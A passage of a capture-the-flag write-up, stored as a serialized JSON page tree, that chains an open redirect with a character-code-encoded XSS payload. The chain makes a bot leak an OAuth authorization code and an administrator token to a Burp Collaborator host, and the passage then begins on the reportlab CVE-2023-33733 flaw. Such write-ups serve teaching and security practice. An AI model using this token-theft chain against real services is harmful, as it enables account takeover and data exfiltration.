:78,"props":3567,"children":3568},{"style":471},[3569],{"type":37,"value":516},{"type":32,"tag":78,"props":3571,"children":3572},{"style":918},[3573],{"type":37,"value":3470},{"type":32,"tag":78,"props":3575,"children":3576},{"style":471},[3577],{"type":37,"value":516},{"type":32,"tag":78,"props":3579,"children":3580},{"style":918},[3581],{"type":37,"value":3582},"32",{"type":32,"tag":78,"props":3584,"children":3585},{"style":471},[3586],{"type":37,"value":516},{"type":32,"tag":78,"props":3588,"children":3589},{"style":918},[3590],{"type":37,"value":3591},"61",{"type":32,"tag":78,"props":3593,"children":3594},{"style":471},[3595],{"type":37,"value":516},{"type":32,"tag":78,"props":3597,"children":3598},{"style":918},[3599],{"type":37,"value":3582},{"type":32,"tag":78,"props":3601,"children":3602},{"style":471},[3603],{"type":37,"value":516},{"type":32,"tag":78,"props":3605,"children":3606},{"style":918},[3607],{"type":37,"value":3608},"96",{"type":32,"tag":78,"props":3610,"children":3611},{"style":471},[3612],{"type":37,"value":516},{"type":32,"tag":78,"props":3614,"children":3615},{"style":918},[3616],{"type":37,"value":3617},"104",{"type":32,"tag":78,"props":3619,"children":3620},{"style":471},[3621],{"type":37,"value":516},{"type":32,"tag":78,"props":3623,"children":3624},{"style":918},[3625],{"type":37,"value":3549},{"type":32,"tag":78,"props":3627,"children":3628},{"style":471},[3629],{"type":37,"value":516},{"type":32,"tag":78,"props":3631,"children":3632},{"style":918},[3633],{"type":37,"value":3549},{"type":32,"tag":78,"props":3635,"children":3636},{"style":471},[3637],{"type":37,"value":516},{"type":32,"tag":78,"props":3639,"children":3640},{"style":918},[3641],{"type":37,"value":3642},"112",{"type":32,"tag":78,"props":3644,"children":3645},{"style":471},[3646],{"type":37,"value":516},{"type":32,"tag":78,"props":3648,"children":3649},{"style":918},[3650],{"type":37,"value":3651},"58",{"type":32,"tag":78,"props":3653,"children":3654},{"style":471},[3655],{"type":37,"value":516},{"type":32,"tag":78,"props":3657,"children":3658},{"style":918},[3659],{"type":37,"value":3660},"47",{"type":32,"tag":78,"props":3662,"children":3663},{"style":471},[3664],{"type":37,"value":516},{"type":32,"tag":78,"props":3666,"children":3667},{"style":918},[3668],{"type":37,"value":3660},{"type":32,"tag":78,"props":3670,"children":3671},{"style":471},[3672],{"type":37,"value":516},{"type":32,"tag":78,"props":3674,"children":3675},{"style":918},[3676],{"type":37,"value":3514},{"type":32,"tag":78,"props":3678,"children":3679},{"style":471},[3680],{"type":37,"value":516},{"type":32,"tag":78,"props":3682,"children":3683},{"style":918},[3684],{"type":37,"value":3531},{"type":32,"tag":78,"props":3686,"children":3687},{"style":471},[3688],{"type":37,"value":516},{"type":32,"tag":78,"props":3690,"children":3691},{"style":918},[3692],{"type":37,"value":3693},"49",{"type":32,"tag":78,"props":3695,"children":3696},{"style":471},[3697],{"type":37,"value":516},{"type":32,"tag":78,"props":3699,"children":3700},{"style":918},[3701],{"type":37,"value":3540},{"type":32,"tag":78,"props":3703,"children":3704},{"style":471},[3705],{"type":37,"value":516},{"type":32,"tag":78,"props":3707,"children":3708},{"style":918},[3709],{"type":37,"value":3710},"122",{"type":32,"tag":78,"props":3712,"children":3713},{"style":471},[3714],{"type":37,"value":516},{"type":32,"tag":78,"props":3716,"children":3717},{"style":918},[3718],{"type":37,"value":3719},"118",{"type":32,"tag":78,"props":3721,"children":3722},{"style":471},[3723],{"type":37,"value":516},{"type":32,"tag":78,"props":3725,"children":3726},{"style":918},[3727],{"type":37,"value":3728},"52",{"type":32,"tag":78,"props":3730,"children":3731},{"style":471},[3732],{"type":37,"value":516},{"type":32,"tag":78,"props":3734,"children":3735},{"style":918},[3736],{"type":37,"value":3470},{"type":32,"tag":78,"props":3738,"children":3739},{"style":471},[3740],{"type":37,"value":516},{"type":32,"tag":78,"props":3742,"children":3743},{"style":918},[3744],{"type":37,"value":3745},"101",{"type":32,"tag":78,"props":3747,"children":3748},{"style":471},[3749],{"type":37,"value":516},{"type":32,"tag":78,"props":3751,"children":3752},{"style":918},[3753],{"type":37,"value":3754},"57",{"type":32,"tag":78,"props":3756,"children":3757},{"style":471},[3758],{"type":37,"value":516},{"type":32,"tag":78,"props":3760,"children":3761},{"style":918},[3762],{"type":37,"value":3452},{"type":32,"tag":78,"props":3764,"children":3765},{"style":471},[3766],{"type":37,"value":516},{"type":32,"tag":78,"props":3768,"children":3769},{"style":918},[3770],{"type":37,"value":3452},{"type":32,"tag":78,"props":3772,"children":3773},{"style":471},[3774],{"type":37,"value":516},{"type":32,"tag":78,"props":3776,"children":3777},{"style":918},[3778],{"type":37,"value":3779},"120",{"type":32,"tag":78,"props":3781,"children":3782},{"style":471},[3783],{"type":37,"value":516},{"type":32,"tag":78,"props":3785,"children":3786},{"style":918},[3787],{"type":37,"value":3470},{"type":32,"tag":78,"props":3789,"children":3790},{"style":471},[3791],{"type":37,"value":516},{"type":32,"tag":78,"props":3793,"children":3794},{"style":918},[3795],{"type":37,"value":3796},"109",{"type":32,"tag":78,"props":3798,"children":3799},{"style":471},[3800],{"type":37,"value":516},{"type":32,"tag":78,"props":3802,"children":3803},{"style":918},[3804],{"type":37,"value":3805},"102",{"type":32,"tag":78,"props":3807,"children":3808},{"style":471},[3809],{"type":37,"value":516},{"type":32,"tag":78,"props":3811,"children":3812},{"style":918},[3813],{"type":37,"value":3779},{"type":32,"tag":78,"props":3815,"children":3816},{"style":471},[3817],{"type":37,"value":516},{"type":32,"tag":78,"props":3819,"children":3820},{"style":918},[3821],{"type":37,"value":3822},"50",{"type":32,"tag":78,"props":3824,"children":3825},{"style":471},[3826],{"type":37,"value":516},{"type":32,"tag":78,"props":3828,"children":3829},{"style":918},[3830],{"type":37,"value":3831},"98",{"type":32,"tag":78,"props":3833,"children":3834},{"style":471},[3835],{"type":37,"value":516},{"type":32,"tag":78,"props":3837,"children":3838},{"style":918},[3839],{"type":37,"value":3710},{"type":32,"tag":78,"props":3841,"children":3842},{"style":471},[3843],{"type":37,"value":516},{"type":32,"tag":78,"props":3845,"children":3846},{"style":918},[3847],{"type":37,"value":3452},{"type":32,"tag":78,"props":3849,"children":3850},{"style":471},[3851],{"type":37,"value":516},{"type":32,"tag":78,"props":3853,"children":3854},{"style":918},[3855],{"type":37,"value":3856},"54",{"type":32,"tag":78,"props":3858,"children":3859},{"style":471},[3860],{"type":37,"value":516},{"type":32,"tag":78,"props":3862,"children":3863},{"style":918},[3864],{"type":37,"value":3710},{"type":32,"tag":78,"props":3866,"children":3867},{"style":471},[3868],{"type":37,"value":516},{"type":32,"tag":78,"props":3870,"children":3871},{"style":918},[3872],{"type":37,"value":3479},{"type":32,"tag":78,"props":3874,"children":3875},{"style":471},[3876],{"type":37,"value":516},{"type":32,"tag":78,"props":3878,"children":3879},{"style":918},[3880],{"type":37,"value":3881},"106",{"type":32,"tag":78,"props":3883,"children":3884},{"style":471},[3885],{"type":37,"value":516},{"type":32,"tag":78,"props":3887,"children":3888},{"style":918},[3889],{"type":37,"value":3728},{"type":32,"tag":78,"props":3891,"children":3892},{"style":471},[3893],{"type":37,"value":516},{"type":32,"tag":78,"props":3895,"children":3896},{"style":918},[3897],{"type":37,"value":3642},{"type":32,"tag":78,"props":3899,"children":3900},{"style":471},[3901],{"type":37,"value":516},{"type":32,"tag":78,"props":3903,"children":3904},{"style":918},[3905],{"type":37,"value":3822},{"type":32,"tag":78,"props":3907,"children":3908},{"style":471},[3909],{"type":37,"value":516},{"type":32,"tag":78,"props":3911,"children":3912},{"style":918},[3913],{"type":37,"value":3479},{"type":32,"tag":78,"props":3915,"children":3916},{"style":471},[3917],{"type":37,"value":516},{"type":32,"tag":78,"props":3919,"children":3920},{"style":918},[3921],{"type":37,"value":3549},{"type":32,"tag":78,"props":3923,"children":3924},{"style":471},[3925],{"type":37,"value":516},{"type":32,"tag":78,"props":3927,"children":3928},{"style":918},[3929],{"type":37,"value":3693},{"type":32,"tag":78,"props":3931,"children":3932},{"style":471},[3933],{"type":37,"value":516},{"type":32,"tag":78,"props":3935,"children":3936},{"style":918},[3937],{"type":37,"value":3461},{"type":32,"tag":78,"props":3939,"children":3940},{"style":471},[3941],{"type":37,"value":516},{"type":32,"tag":78,"props":3943,"children":3944},{"style":918},[3945],{"type":37,"value":3505},{"type":32,"tag":78,"props":3947,"children":3948},{"style":471},[3949],{"type":37,"value":516},{"type":32,"tag":78,"props":3951,"children":3952},{"style":918},[3953],{"type":37,"value":3488},{"type":32,"tag":78,"props":3955,"children":3956},{"style":471},[3957],{"type":37,"value":516},{"type":32,"tag":78,"props":3959,"children":3960},{"style":918},[3961],{"type":37,"value":3540},{"type":32,"tag":78,"props":3963,"children":3964},{"style":471},[3965],{"type":37,"value":516},{"type":32,"tag":78,"props":3967,"children":3968},{"style":918},[3969],{"type":37,"value":3970},"115",{"type":32,"tag":78,"props":3972,"children":3973},{"style":471},[3974],{"type":37,"value":516},{"type":32,"tag":78,"props":3976,"children":3977},{"style":918},[3978],{"type":37,"value":3549},{"type":32,"tag":78,"props":3980,"children":3981},{"style":471},[3982],{"type":37,"value":516},{"type":32,"tag":78,"props":3984,"children":3985},{"style":918},[3986],{"type":37,"value":3461},{"type":32,"tag":78,"props":3988,"children":3989},{"style":471},[3990],{"type":37,"value":516},{"type":32,"tag":78,"props":3992,"children":3993},{"style":918},[3994],{"type":37,"value":3805},{"type":32,"tag":78,"props":3996,"children":3997},{"style":471},[3998],{"type":37,"value":516},{"type":32,"tag":78,"props":4000,"children":4001},{"style":918},[4002],{"type":37,"value":4003},"121",{"type":32,"tag":78,"props":4005,"children":4006},{"style":471},[4007],{"type":37,"value":516},{"type":32,"tag":78,"props":4009,"children":4010},{"style":918},[4011],{"type":37,"value":3505},{"type":32,"tag":78,"props":4013,"children":4014},{"style":471},[4015],{"type":37,"value":516},{"type":32,"tag":78,"props":4017,"children":4018},{"style":918},[4019],{"type":37,"value":3531},{"type":32,"tag":78,"props":4021,"children":4022},{"style":471},[4023],{"type":37,"value":516},{"type":32,"tag":78,"props":4025,"children":4026},{"style":918},[4027],{"type":37,"value":3488},{"type":32,"tag":78,"props":4029,"children":4030},{"style":471},[4031],{"type":37,"value":516},{"type":32,"tag":78,"props":4033,"children":4034},{"style":918},[4035],{"type":37,"value":3796},{"type":32,"tag":78,"props":4037,"children":4038},{"style":471},[4039],{"type":37,"value":516},{"type":32,"tag":78,"props":4041,"children":4042},{"style":918},[4043],{"type":37,"value":3660},{"type":32,"tag":78,"props":4045,"children":4046},{"style":471},[4047],{"type":37,"value":516},{"type":32,"tag":78,"props":4049,"children":4050},{"style":918},[4051],{"type":37,"value":4052},"63",{"type":32,"tag":78,"props":4054,"children":4055},{"style":471},[4056],{"type":37,"value":516},{"type":32,"tag":78,"props":4058,"children":4059},{"style":918},[4060],{"type":37,"value":3831},{"type":32,"tag":78,"props":4062,"children":4063},{"style":471},[4064],{"type":37,"value":516},{"type":32,"tag":78,"props":4066,"children":4067},{"style":918},[4068],{"type":37,"value":3488},{"type":32,"tag":78,"props":4070,"children":4071},{"style":471},[4072],{"type":37,"value":516},{"type":32,"tag":78,"props":4074,"children":4075},{"style":918},[4076],{"type":37,"value":3479},{"type":32,"tag":78,"props":4078,"children":4079},{"style":471},[4080],{"type":37,"value":516},{"type":32,"tag":78,"props":4082,"children":4083},{"style":918},[4084],{"type":37,"value":4003},{"type":32,"tag":78,"props":4086,"children":4087},{"style":471},[4088],{"type":37,"value":516},{"type":32,"tag":78,"props":4090,"children":4091},{"style":918},[4092],{"type":37,"value":3591},{"type":32,"tag":78,"props":4094,"children":4095},{"style":471},[4096],{"type":37,"value":516},{"type":32,"tag":78,"props":4098,"children":4099},{"style":918},[4100],{"type":37,"value":4101},"36",{"type":32,"tag":78,"props":4103,"children":4104},{"style":471},[4105],{"type":37,"value":516},{"type":32,"tag":78,"props":4107,"children":4108},{"style":918},[4109],{"type":37,"value":4110},"123",{"type":32,"tag":78,"props":4112,"children":4113},{"style":471},[4114],{"type":37,"value":516},{"type":32,"tag":78,"props":4116,"children":4117},{"style":918},[4118],{"type":37,"value":3831},{"type":32,"tag":78,"props":4120,"children":4121},{"style":471},[4122],{"type":37,"value":516},{"type":32,"tag":78,"props":4124,"children":4125},{"style":918},[4126],{"type":37,"value":3549},{"type":32,"tag":78,"props":4128,"children":4129},{"style":471},[4130],{"type":37,"value":516},{"type":32,"tag":78,"props":4132,"children":4133},{"style":918},[4134],{"type":37,"value":3488},{"type":32,"tag":78,"props":4136,"children":4137},{"style":471},[4138],{"type":37,"value":516},{"type":32,"tag":78,"props":4140,"children":4141},{"style":918},[4142],{"type":37,"value":3540},{"type":32,"tag":78,"props":4144,"children":4145},{"style":471},[4146],{"type":37,"value":516},{"type":32,"tag":78,"props":4148,"children":4149},{"style":918},[4150],{"type":37,"value":4151},"40",{"type":32,"tag":78,"props":4153,"children":4154},{"style":471},[4155],{"type":37,"value":516},{"type":32,"tag":78,"props":4157,"children":4158},{"style":918},[4159],{"type":37,"value":3479},{"type":32,"tag":78,"props":4161,"children":4162},{"style":471},[4163],{"type":37,"value":516},{"type":32,"tag":78,"props":4165,"children":4166},{"style":918},[4167],{"type":37,"value":3488},{"type":32,"tag":78,"props":4169,"children":4170},{"style":471},[4171],{"type":37,"value":516},{"type":32,"tag":78,"props":4173,"children":4174},{"style":918},[4175],{"type":37,"value":3531},{"type":32,"tag":78,"props":4177,"children":4178},{"style":471},[4179],{"type":37,"value":516},{"type":32,"tag":78,"props":4181,"children":4182},{"style":918},[4183],{"type":37,"value":4184},"117",{"type":32,"tag":78,"props":4186,"children":4187},{"style":471},[4188],{"type":37,"value":516},{"type":32,"tag":78,"props":4190,"children":4191},{"style":918},[4192],{"type":37,"value":3796},{"type":32,"tag":78,"props":4194,"children":4195},{"style":471},[4196],{"type":37,"value":516},{"type":32,"tag":78,"props":4198,"children":4199},{"style":918},[4200],{"type":37,"value":3745},{"type":32,"tag":78,"props":4202,"children":4203},{"style":471},[4204],{"type":37,"value":516},{"type":32,"tag":78,"props":4206,"children":4207},{"style":918},[4208],{"type":37,"value":3470},{"type":32,"tag":78,"props":4210,"children":4211},{"style":471},[4212],{"type":37,"value":516},{"type":32,"tag":78,"props":4214,"children":4215},{"style":918},[4216],{"type":37,"value":3549},{"type":32,"tag":78,"props":4218,"children":4219},{"style":471},[4220],{"type":37,"value":516},{"type":32,"tag":78,"props":4222,"children":4223},{"style":918},[4224],{"type":37,"value":3505},{"type":32,"tag":78,"props":4226,"children":4227},{"style":471},[4228],{"type":37,"value":516},{"type":32,"tag":78,"props":4230,"children":4231},{"style":918},[4232],{"type":37,"value":3831},{"type":32,"tag":78,"props":4234,"children":4235},{"style":471},[4236],{"type":37,"value":516},{"type":32,"tag":78,"props":4238,"children":4239},{"style":918},[4240],{"type":37,"value":3488},{"type":32,"tag":78,"props":4242,"children":4243},{"style":471},[4244],{"type":37,"value":516},{"type":32,"tag":78,"props":4246,"children":4247},{"style":918},[4248],{"type":37,"value":3479},{"type":32,"tag":78,"props":4250,"children":4251},{"style":471},[4252],{"type":37,"value":516},{"type":32,"tag":78,"props":4254,"children":4255},{"style":918},[4256],{"type":37,"value":4003},{"type":32,"tag":78,"props":4258,"children":4259},{"style":471},[4260],{"type":37,"value":516},{"type":32,"tag":78,"props":4262,"children":4263},{"style":918},[4264],{"type":37,"value":3505},{"type":32,"tag":78,"props":4266,"children":4267},{"style":471},[4268],{"type":37,"value":516},{"type":32,"tag":78,"props":4270,"children":4271},{"style":918},[4272],{"type":37,"value":3461},{"type":32,"tag":78,"props":4274,"children":4275},{"style":471},[4276],{"type":37,"value":516},{"type":32,"tag":78,"props":4278,"children":4279},{"style":918},[4280],{"type":37,"value":3470},{"type":32,"tag":78,"props":4282,"children":4283},{"style":471},[4284],{"type":37,"value":516},{"type":32,"tag":78,"props":4286,"children":4287},{"style":918},[4288],{"type":37,"value":3470},{"type":32,"tag":78,"props":4290,"children":4291},{"style":471},[4292],{"type":37,"value":516},{"type":32,"tag":78,"props":4294,"children":4295},{"style":918},[4296],{"type":37,"value":3745},{"type":32,"tag":78,"props":4298,"children":4299},{"style":471},[4300],{"type":37,"value":516},{"type":32,"tag":78,"props":4302,"children":4303},{"style":918},[4304],{"type":37,"value":4305},"114",{"type":32,"tag":78,"props":4307,"children":4308},{"style":471},[4309],{"type":37,"value":516},{"type":32,"tag":78,"props":4311,"children":4312},{"style":918},[4313],{"type":37,"value":4314},"72",{"type":32,"tag":78,"props":4316,"children":4317},{"style":471},[4318],{"type":37,"value":516},{"type":32,"tag":78,"props":4320,"children":4321},{"style":918},[4322],{"type":37,"value":4323},"84",{"type":32,"tag":78,"props":4325,"children":4326},{"style":471},[4327],{"type":37,"value":516},{"type":32,"tag":78,"props":4329,"children":4330},{"style":918},[4331],{"type":37,"value":4332},"77",{"type":32,"tag":78,"props":4334,"children":4335},{"style":471},[4336],{"type":37,"value":516},{"type":32,"tag":78,"props":4338,"children":4339},{"style":918},[4340],{"type":37,"value":4341},"76",{"type":32,"tag":78,"props":4343,"children":4344},{"style":471},[4345],{"type":37,"value":516},{"type":32,"tag":78,"props":4347,"children":4348},{"style":918},[4349],{"type":37,"value":4350},"41",{"type":32,"tag":78,"props":4352,"children":4353},{"style":471},[4354],{"type":37,"value":516},{"type":32,"tag":78,"props":4356,"children":4357},{"style":918},[4358],{"type":37,"value":4359},"125",{"type":32,"tag":78,"props":4361,"children":4362},{"style":471},[4363],{"type":37,"value":516},{"type":32,"tag":78,"props":4365,"children":4366},{"style":918},[4367],{"type":37,"value":3608},{"type":32,"tag":78,"props":4369,"children":4370},{"style":471},[4371],{"type":37,"value":4372},"))",{"type":32,"tag":78,"props":4374,"children":4375},{"style":498},[4376],{"type":37,"value":3329},{"type":32,"tag":78,"props":4378,"children":4379},{"style":471},[4380],{"type":37,"value":3371},{"type":32,"tag":46,"props":4382,"children":4383},{},[4384],{"type":37,"value":4385},"So, now we have our openredirect vulnerability, our xss, just chain them together allowing us to retrieve the admin token from the service on port 4000.",{"type":32,"tag":258,"props":4387,"children":4389},{"id":4388},"oauth2code",[4390],{"type":37,"value":3118},{"type":32,"tag":46,"props":4392,"children":4393},{},[4394,4396,4402],{"type":37,"value":4395},"First, we call the bot by redirecting it to the oauth2/code route using the open redirect exploit. And we add the redirection_url parameters as our Burp Collaborator url. This allows us to retrieve the ",{"type":32,"tag":74,"props":4397,"children":4399},{"className":4398},[],[4400],{"type":37,"value":4401},"authorization_code",{"type":37,"value":4403}," parameter.",{"type":32,"tag":46,"props":4405,"children":4406},{},[4407],{"type":37,"value":4408},"You can find below the sent request:",{"type":32,"tag":52,"props":4410,"children":4412},{"imgSrc":4411},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704320776/writeups/phantom-feed/request_get_code_oauth2.webp",[],{"type":32,"tag":46,"props":4414,"children":4415},{},[4416],{"type":37,"value":4417},"We can see:",{"type":32,"tag":290,"props":4419,"children":4420},{},[4421,4426,4438,4450],{"type":32,"tag":294,"props":4422,"children":4423},{},[4424],{"type":37,"value":4425},"In white, the HTTP headers of the request with the token of the user.",{"type":32,"tag":294,"props":4427,"children":4428},{},[4429,4431,4436],{"type":37,"value":4430},"In green, the exploitation of the open redirect that redirects the bot to the ",{"type":32,"tag":74,"props":4432,"children":4434},{"className":4433},[],[4435],{"type":37,"value":3214},{"type":37,"value":4437}," route.",{"type":32,"tag":294,"props":4439,"children":4440},{},[4441,4443,4448],{"type":37,"value":4442},"In blue, the ",{"type":32,"tag":74,"props":4444,"children":4446},{"className":4445},[],[4447],{"type":37,"value":3260},{"type":37,"value":4449}," parameter that includes the URL of our Burp Collaborator.",{"type":32,"tag":294,"props":4451,"children":4452},{},[4453],{"type":37,"value":4454},"In red, our XSS payload.",{"type":32,"tag":46,"props":4456,"children":4457},{},[4458,4460],{"type":37,"value":4459},"Here we note that our XSS payload is present but will actually be executed only in the next step. This payload is present because ",{"type":32,"tag":284,"props":4461,"children":4462},{},[4463,4465,4471,4473,4479],{"type":37,"value":4464},"it is imperative that the client_id and redirect_url parameters be identical during both calls (",{"type":32,"tag":74,"props":4466,"children":4468},{"className":4467},[],[4469],{"type":37,"value":4470},"/code",{"type":37,"value":4472}," and ",{"type":32,"tag":74,"props":4474,"children":4476},{"className":4475},[],[4477],{"type":37,"value":4478},"/token",{"type":37,"value":1036},{"type":32,"tag":46,"props":4481,"children":4482},{},[4483,4485,4490],{"type":37,"value":4484},"We can see below the response sent to our collaborator. We can get now the ",{"type":32,"tag":74,"props":4486,"children":4488},{"className":4487},[],[4489],{"type":37,"value":4401},{"type":37,"value":4491}," parameter is present in the response.",{"type":32,"tag":52,"props":4493,"children":4495},{"imgSrc":4494},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319319/writeups/phantom-feed/oauth_token_get_authorized_code.webp",[],{"type":32,"tag":258,"props":4497,"children":4499},{"id":4498},"oauth2token",[4500],{"type":37,"value":4501},"oauth2/token",{"type":32,"tag":46,"props":4503,"children":4504},{},[4505,4507,4513],{"type":37,"value":4506},"So now, we have our ",{"type":32,"tag":74,"props":4508,"children":4510},{"className":4509},[],[4511],{"type":37,"value":4512},"authorized_code",{"type":37,"value":4514}," which was sent back to us by our collaborator.",{"type":32,"tag":46,"props":4516,"children":4517},{},[4518,4520,4525,4527,4532],{"type":37,"value":4519},"The next step is to use the ",{"type":32,"tag":74,"props":4521,"children":4523},{"className":4522},[],[4524],{"type":37,"value":4512},{"type":37,"value":4526}," with a call to the ",{"type":32,"tag":74,"props":4528,"children":4530},{"className":4529},[],[4531],{"type":37,"value":3160},{"type":37,"value":4533}," route using the open redirect (as in the previous step). At this point, the bot will execute our XSS payload, which will return the body of the response. This body will contain the administrator's token.",{"type":32,"tag":46,"props":4535,"children":4536},{},[4537,4539,4544],{"type":37,"value":4538},"Only the ",{"type":32,"tag":74,"props":4540,"children":4542},{"className":4541},[],[4543],{"type":37,"value":4401},{"type":37,"value":4545}," parameter was added to the request.",{"type":32,"tag":52,"props":4547,"children":4549},{"imgSrc":4548},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704321315/writeups/phantom-feed/request_get_token_admin_oauth2.webp",[],{"type":32,"tag":46,"props":4551,"children":4552},{},[4553],{"type":37,"value":4554},"We can see below the response sent to our collaborator.",{"type":32,"tag":52,"props":4556,"children":4558},{"imgSrc":4557},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319375/writeups/phantom-feed/oauth2_body_stealed.webp",[],{"type":32,"tag":46,"props":4560,"children":4561},{},[4562],{"type":37,"value":4563},"If we decode the JWT, we can see that the data part indeed carries the user \"administrator\", allowing us to proceed to the next step.",{"type":32,"tag":52,"props":4565,"children":4567},{"imgSrc":4566},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319406/writeups/phantom-feed/admin_token.webp",[],{"type":32,"tag":46,"props":4569,"children":4570},{},[4571],{"type":37,"value":4572},"On the following chapter, we will detail what is possible to do as an administrator.",{"type":32,"tag":39,"props":4574,"children":4576},{"id":4575},"exploit-reportlab-library-cve-2023-33733",[4577],{"type":37,"value":4578},"Exploit reportlab library (CVE-2023-33733)",{"type":32,"tag":46,"props":4580,"children":4581},{},[4582],{"type":37,"value":4583},"We now have an admin token that allows us to interact with the port 4000 service. If we take a closer look at the routes of this service, we can see that one route is particularly interesting:",{"type":32,"tag":63,"props":4585,"children":4586},{"lang":456},[4587],{"type":32,"tag":68,"props":4588,"children":4590},{"className":460,"code":4589,"language":456,"meta":7,"style":7},"@web.route(\"/orders/html\", methods = [\"POST\"])\n@admin_middleware\ndef orders_html():\n  color = request.form.get(\"color\")\n\n  if not color:\n    return response(\"No color\"), 400\n\n  db_session = Database()\n  orders = db_session.get_all_orders()\n  \n  if not orders:\n    return response(\"No orders placed\"), 200\n\n  orders_template = render_template(\"orders.html\", color=color)\n  \n  html2pdf = HTML2PDF()\n  pdf = html2pdf.convert(orders_template, orders)\n  \n  pdf.seek(0)\n  return send_file(pdf, as_attachment=True, download_name=\"orders.pdf\", mimetype=\"application/pdf\")\n",[4591],{"type":32,"tag":74,"props":4592,"children":4593},{"__ignoreMap":7},[4594,4662,4674,4690,4745,4752,4774,4812,4819,4840,4869,4876,4896,4932,4939,4992,4999,5020,5067,5074,5104],{"type":32,"tag":78,"props":4595,"children":4596},{"class":80,"line":81},[4597,4601,4605,4609,4613,4617,4621,4626,4630,4634,4638,4642,4646,4650,4654,4658],{"type":32,"tag":78,"props":4598,"children":4599},{"style":471},[4600],{"type":37,"value":474},{"type":32,"tag":78,"props":4602,"children":4603},{"style":477},[4604],{"type":37,"value":480},{"type":32,"tag":78,"props":4606,"children":4607},{"style":471},[4608],{"type":37,"value":485},{"type":32,"tag":78,"props":4610,"children":4611},{"style":477},[4612],{"type":37,"value":490},{"type":32,"tag":78,"props":4614,"children":4615},{"style":471},[4616],{"type":37,"value":495},{"type":32,"tag":78,"props":4618,"children":4619},{"style":498},[4620],{"type":37,"value":501},{"type":32,"tag":78,"props":4622,"children":4623},{"style":504},[4624],{"type":37,"value":4625},"/orders/html",{"type":32,"tag":78,"props":4627,"children":4628},{"style":498},[4629],{"type":37,"value":501},{"type":32,"tag":78,"props":4631,"children":4632},{"style":471},[4633],{"type":37,"value":516},{"type":32,"tag":78,"props":4635,"children":4636},{"style":519},[4637],{"type":37,"value":522},{"type":32,"tag":78,"props":4639,"children":4640},{"style":471},[4641],{"type":37,"value":1265},{"type":32,"tag":78,"props":4643,"children":4644},{"style":471},[4645],{"type":37,"value":2421},{"type":32,"tag":78,"props":4647,"children":4648},{"style":498},[4649],{"type":37,"value":501},{"type":32,"tag":78,"props":4651,"children":4652},{"style":504},[4653],{"type":37,"value":554},{"type":32,"tag":78,"props":4655,"children":4656},{"style":498},[4657],{"type":37,"value":501},{"type":32,"tag":78,"props":4659,"children":4660},{"style":471},[4661],{"type":37,"value":563},{"type":32,"tag":78,"props":4663,"children":4664},{"class":80,"line":90},[4665,4669],{"type":32,"tag":78,"props":4666,"children":4667},{"style":471},[4668],{"type":37,"value":474},{"type":32,"tag":78,"props":4670,"children":4671},{"style":477},[4672],{"type":37,"value":4673},"admin_middleware\n",{"type":32,"tag":78,"props":4675,"children":4676},{"class":80,"line":99},[4677,4681,4686],{"type":32,"tag":78,"props":4678,"children":4679},{"style":569},[4680],{"type":37,"value":572},{"type":32,"tag":78,"props":4682,"children":4683},{"style":477},[4684],{"type":37,"value":4685}," orders_html",{"type":32,"tag":78,"props":4687,"children":4688},{"style":471},[4689],{"type":37,"value":582},{"type":32,"tag":78,"props":4691,"children":4692},{"class":80,"line":108},[4693,4698,4702,4707,4711,4716,4720,4724,4728,4732,4737,4741],{"type":32,"tag":78,"props":4694,"children":4695},{"style":607},[4696],{"type":37,"value":4697},"  color ",{"type":32,"tag":78,"props":4699,"children":4700},{"style":471},[4701],{"type":37,"value":624},{"type":32,"tag":78,"props":4703,"children":4704},{"style":607},[4705],{"type":37,"value":4706}," request",{"type":32,"tag":78,"props":4708,"children":4709},{"style":471},[4710],{"type":37,"value":485},{"type":32,"tag":78,"props":4712,"children":4713},{"style":607},[4714],{"type":37,"value":4715},"form",{"type":32,"tag":78,"props":4717,"children":4718},{"style":471},[4719],{"type":37,"value":485},{"type":32,"tag":78,"props":4721,"children":4722},{"style":607},[4723],{"type":37,"value":2494},{"type":32,"tag":78,"props":4725,"children":4726},{"style":471},[4727],{"type":37,"value":495},{"type":32,"tag":78,"props":4729,"children":4730},{"style":498},[4731],{"type":37,"value":501},{"type":32,"tag":78,"props":4733,"children":4734},{"style":504},[4735],{"type":37,"value":4736},"color",{"type":32,"tag":78,"props":4738,"children":4739},{"style":498},[4740],{"type":37,"value":501},{"type":32,"tag":78,"props":4742,"children":4743},{"style":471},[4744],{"type":37,"value":722},{"type":32,"tag":78,"props":4746,"children":4747},{"class":80,"line":117},[4748],{"type":32,"tag":78,"props":4749,"children":4750},{"emptyLinePlaceholder":157},[4751],{"type":37,"value":160},{"type":32,"tag":78,"props":4753,"children":4754},{"class":80,"line":126},[4755,4760,4765,4770],{"type":32,"tag":78,"props":4756,"children":4757},{"style":833},[4758],{"type":37,"value":4759},"  if",{"type":32,"tag":78,"props":4761,"children":4762},{"style":569},[4763],{"type":37,"value":4764}," not",{"type":32,"tag":78,"props":4766,"children":4767},{"style":607},[4768],{"type":37,"value":4769}," color",{"type":32,"tag":78,"props":4771,"children":4772},{"style":471},[4773],{"type":37,"value":1545},{"type":32,"tag":78,"props":4775,"children":4776},{"class":80,"line":135},[4777,4781,4786,4790,4794,4799,4803,4807],{"type":32,"tag":78,"props":4778,"children":4779},{"style":833},[4780],{"type":37,"value":1178},{"type":32,"tag":78,"props":4782,"children":4783},{"style":607},[4784],{"type":37,"value":4785}," response",{"type":32,"tag":78,"props":4787,"children":4788},{"style":471},[4789],{"type":37,"value":495},{"type":32,"tag":78,"props":4791,"children":4792},{"style":498},[4793],{"type":37,"value":501},{"type":32,"tag":78,"props":4795,"children":4796},{"style":504},[4797],{"type":37,"value":4798},"No color",{"type":32,"tag":78,"props":4800,"children":4801},{"style":498},[4802],{"type":37,"value":501},{"type":32,"tag":78,"props":4804,"children":4805},{"style":471},[4806],{"type":37,"value":915},{"type":32,"tag":78,"props":4808,"children":4809},{"style":918},[4810],{"type":37,"value":4811}," 400\n",{"type":32,"tag":78,"props":4813,"children":4814},{"class":80,"line":144},[4815],{"type":32,"tag":78,"props":4816,"children":4817},{"emptyLinePlaceholder":157},[4818],{"type":37,"value":160},{"type":32,"tag":78,"props":4820,"children":4821},{"class":80,"line":153},[4822,4827,4831,4836],{"type":32,"tag":78,"props":4823,"children":4824},{"style":607},[4825],{"type":37,"value":4826},"  db_session 